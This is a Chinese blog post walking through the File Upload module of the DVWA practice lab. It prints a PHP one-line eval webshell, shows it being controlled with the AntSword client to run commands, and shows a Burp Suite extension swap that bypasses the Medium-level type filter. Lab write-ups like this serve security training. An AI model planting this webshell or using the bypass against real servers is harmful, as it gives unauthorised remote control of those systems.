【DVWA】——File Upload(文件上传)

于 2024-09-15 22:26:42 发布
阅读量244 收藏 2
点赞数 2
分类专栏: 渗透测试 文章标签: 测试 学习 笔记 安全测试 渗透测试 DVWA 文件上传
❗ 转载请注明出处 作者:HinsCoder 博客链接:
本文链接:https://blog.csdn.net/HinsCoder/article/details/142246098
版权

📖 前言:文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。

目录

🕒 1. Low

满足这三个条件,攻击者就能够成功入侵

  • 木马上传成功,未被杀;
  • 知道木马的路径在哪;
  • 上传的木马能正常运行(解析)。

没有任何限制,所以直接上传一句简短代码(一句话木马)即可

<?php @eval($_POST['csb']);
echo "vulnerable";
?>

在这里插入图片描述
在这里插入图片描述

接下来需要用到一款Shell控制工具——中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。简而言之,中国蚁剑是一款的shell控制端软件。

🔎 中国蚁剑

第一次安装项目需要先初始化,我们解压到下面的文件夹

AntSword-Loader-v4.0.3-win32-x64\antSword-master

初始化完成后打开,首先右键空白处,点击添加数据

在这里插入图片描述
将上传的URL添加进去

http://192.168.31.57:8080/hackable/uploads/webshell.php

在这里插入图片描述

密码就是刚才后门的密码:csb,测试连接成功后即可添加

在这里插入图片描述

双击该URL地址,可以看到起其目录文件信息,随后右键在此处打开终端

在这里插入图片描述

在这里插入图片描述

此时就可以随意输入指令,实现远控了。

🕒 2. Medium

在这里插入图片描述
可以看到,靶场对文件类型做了限制,只允许上传png、jpeg

此时我们可以把一句话木马改为png后缀

在这里插入图片描述

然后使用BP抓包,将文件后缀改成php

在这里插入图片描述

在这里插入图片描述
使用webshell连接同上。

OK,以上就是本期知识点“File Upload(文件上传)”的知识啦~~ ,感谢友友们的阅读。后续还会继续更新,欢迎持续关注哟📌~
💫如果有错误❌,欢迎批评指正呀👀~让我们一起相互进步🚀
🎉如果觉得收获满满,可以点点赞👍支持一下哟~

❗ 转载请注明出处
作者:HinsCoder
博客链接:🔎 作者博客主页

HinsCoder
关注
专栏目录
DVWA——File Upload
qq_54448882的博客
11-09 3192
此文章仅供学习使用,请勿用作违法行为。 目录 简介 文件上传漏洞 Webshell(网页后门) 造成文件上传漏洞的主要原因 危害 Low 上传一句话木马 使用蚁剑连接 Medium 上传一句话木马 拦截信息改变上传文件类型 蚁剑连接 简介: 文件上传漏洞: 文件上传漏洞主要攻击web服务,有文件上传存在的地方都有可能存在文件上传的漏洞,但并不是所有地方都存在这个漏洞。漏洞是否存在取决于对方的代码的完整性,若某些验证代码存在疏忽,就很可能造成文件上传漏洞。例...
DVWA系列——File Upload文件上传
weixin_49340699的博客
12-12 1160
DVWA系列——File Upload文件上传)简介low级别源码分析上传木马打开中国菜刀进行连接medium源码分析破解思路high源码分析破解思路方法一方法二impossible 简介 File Upload文件上传漏洞,通常是由于对上传文件的类型内容没有进行严格的过滤检查使得可以上传webshell获取服务器权限,所以文件上传漏洞带来的危害也是毁灭性的。 low级别 源码分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are
DVWA —— File Upload 文件上传
YouTheFreedom的博客
05-23 393
文件上传漏洞通常由于网页代码中的文件上传路径变量过滤不严或webserver相关解析漏洞未修复而造成的,如果文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,攻击者可通过 Web 访问的目录上传任意文件,包括网站后门文件(webshell),进而远程控制网站服务器。 攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
DVWA ——File Upload 任意文件上传
weixin_51559599的博客
11-16 256
low 级别的文件上传没有任何过滤。
DVWA——File Upload(low)
分享简单的安全技术
01-05 339
File Upload 界面 源代码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we
DVWA靶场系列(四)—— File Upload文件上传
qq_45612828的博客
07-12 5947
DVWA靶场系列(四)—— File Upload文件上传
DVWA —— File Upload分析
weixin_30369087的博客
02-17 75
Low Low等级的源码如下,对上传文件格式并未做出任何过滤,上传成功后还回显了文件的路径 直接上传php文件,上传成功 到该路径下查看php文件,文件成功解析 Medium Medium等级下的代码对文件类型进行了过滤,限制只能够上传JPEG和png图片,并限制上传文件大小 但仍可以先修改文件扩展名为jpeg,然后抓包看到文件类型为image/jpeg,再将文件...
dvwa练习——file upload and inclusion(文件上传及包含)
haoaaao的博客
01-25 260
一、 file upload难度高级➕inclusion难度低级 1、使用终端拼接php木马文件和jpg文件为111shell2.jpg 2、file upload上传文件 3、进入file inclusion。 (1)inclusion的url地址为: http://192.168.1.32:8082/vulnerabilities/fi/?page=include.php (2)上传成功的拼接文件题目所给地址为: ../../hacka...
Kali渗透测试DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 5878
一、File Upload文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
代码审计——DVWA File Upload文件上传
z1756227332的博客
03-10 377
Low等级代码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES...
4.File Upload(High)——小白笔记——DVWA
qwsn
11-16 1736
0x01:High级别的DVWA测试 1.上源码 File Upload Source: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
面试真题 | web自动化关闭浏览器,quit()和close()的区别
NHB234567的博客
09-13 312
关闭所有的浏览器窗口,销毁driver操作,则需要使用的是quit方法;当打开了多个窗口,只想要关闭非最后一个窗口的时候,使用的是close方法。这些资料,对于【软件测试】的朋友来说应该是最全面最完整的备战仓库,这个仓库也陪伴上万个测试工程师们走过最艰难的路程,希望也能帮助到你!close():只关闭当前的浏览器标签页,如果当前浏览器标签页剩下最后一个,则所有标签页面退出。是否编写过对应浏览器退出的测试用例。quit():所有的浏览器窗口退出。关闭当前的标签页,其他窗口不退出。退出当前所有的窗口;
【二分查找】1348. 推文计数
闻缺陷则喜何志丹
09-13 692
一家社交媒体公司正试图通过分析特定时间段内出现的推文数量来监控其网站上的活动。这些时间段可以根据特定的频率( 每分钟 、每小时 或 每一天 )划分为更小的 时间段 。 例如,周期 [10,10000] (以 秒 为单位)将被划分为以下频率的 时间块 : 每 分钟 (60秒 块): [10,69], [70,129], [130,189], ..., [9970,10000] 每 小时 (3600秒 块):[10,3609], [3610,7209], [7210,10000] 每 天 (86400秒 块):
白盒测试与黑盒测试
最新发布
yang_xs的博客(只讲干货)
09-14 1044
特性白盒测试黑盒测试测试视角了解软件内部结构,关注代码细节不了解内部结构,只关注功能和界面测试内容测试代码逻辑、路径、数据流测试软件功能、性能、用户界面测试方法语句覆盖、分支覆盖、路径覆盖等价类划分、边界值分析、错误推测优点发现代码中的隐藏错误,提高代码质量贴近用户操作,发现功能缺陷缺点测试范围有限,难以发现外部接口问题无法发现内部逻辑错误,需大量测试用例白盒测试和黑盒测试通常结合使用白盒测试侧重于代码的正确性黑盒测试则模拟用户操作,验证软件的功能性。+++
如何用Appium实现移动端UI自动化测试
zhangsiyuan1998的博客
09-14 1224
要实现App的自动化测试,实现Appium工具的入门:1-首先在windows下安装jdk,Android-sdk环境2-安装appium桌面工具3-安装模拟器(比如雷电模拟器),或者使用真机4-安装python的依赖包(Appium-Python-Client)5-启动appium服务器,启动模拟器,然后在pycharm中运行demo脚本,即可看到运行效果接下来可以学习下常用的appium的api、学习如何进行元素定位、然后再学习PO模式的封装,即可完成appium工具的入门和使用。
转行软件测试工程师经验总结
2402_84109700的博客
09-12 557
数据安全官,CCRC-DSA数据安全评估师,CCRC-DCO数据合规官,CDO首席数据官, ITSS IT服务项目经理,IT服务项目工程师,ISO27001,CISP,软考,CISAW应急服务方向,CISAW渗透测试方向,软考,CCSC网络安全能力,工信部教考中心计算机网络安全相关认证办理。在测试理论方面,要熟悉常用的测试用例设计方法,理解不同测试类型的特点,掌握测试用例的基本格式,以及测试结束的标准。最终,我如愿以偿地加入了一家互联网公司,这里的办公环境优越,薪资也较之前的工作有所提升,使我心情愉悦。
使用豆包MarsCode编程助手提升开发效率的实战分享!
**My Coding Family**
09-13 1236
何为MarsCode?这里我先给大家科普一下,免有的同学云里雾里。豆包MarsCode编程助手,它是由豆包推出的一款全方位的AI编程助手,旨在通过智能化的技术提升开发者的工作效率和代码质量。MarsCode支持多种主流编程语言(如Python、Java、JavaScript、C++等)和集成开发环境(IDE),能够在开发过程中提供实时的代码补全、优化建议、单元测试生成、Bug修复以及代码解释等多种功能。
【Java自动化学习】接口自动化
qq_73471456的博客
09-12 874
接口(Interface)是一种约定俗成的规范。可以简单的理解就是一个地址,通过地址能访问到数据。能够进行前后台数据交互。
DVWAFile Upload模块展开实验
06-10
好的,我可以为您提供一些关于DVWAFile Upload模块的实验步骤。首先,您需要了解一下DVWA是什么。DVWA(Damn Vulnerable Web Application)是一个用于练习网络渗透测试技能的虚拟机环境,其中包含多个漏洞,可供练习和学习。其中就包括File Upload模块。 以下是一些关于DVWAFile Upload模块的实验步骤: 1. 首先,您需要在本地安装DVWA,并启动它。您可以使用XAMPP等工具来安装和启动DVWA。 2. 登录到DVWA并选择File Upload模块。 3. 选择一个文件并上传。您可以尝试上传一些不同类型的文件,如图片、文本文件、PDF等。 4. 观察上传后的结果。如果上传成功,您应该能够看到一个已上传的文件列表,并且您上传的文件应该显示在列表中。 5. 试着上传一些恶意文件,如包含恶意代码的文件。观察上传后的结果并尝试分析它们的影响。 6. 尝试绕过文件上传的限制。您可以尝试通过修改文件扩展名、使用特殊字符或修改HTTP报文来绕过文件类型和大小的限制。 7. 尝试利用文件上传漏洞进行攻击。您可以尝试上传一个包含Web Shell的文件,并尝试通过Web Shell来获取系统权限。 需要注意的是,您在进行实验时应该遵循合法的道德和法律标准,不得以任何非法或不道德的方式使用这些技术。同时,您应该在安全的环境中进行实验,以避免对其他人或组织的系统造成损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值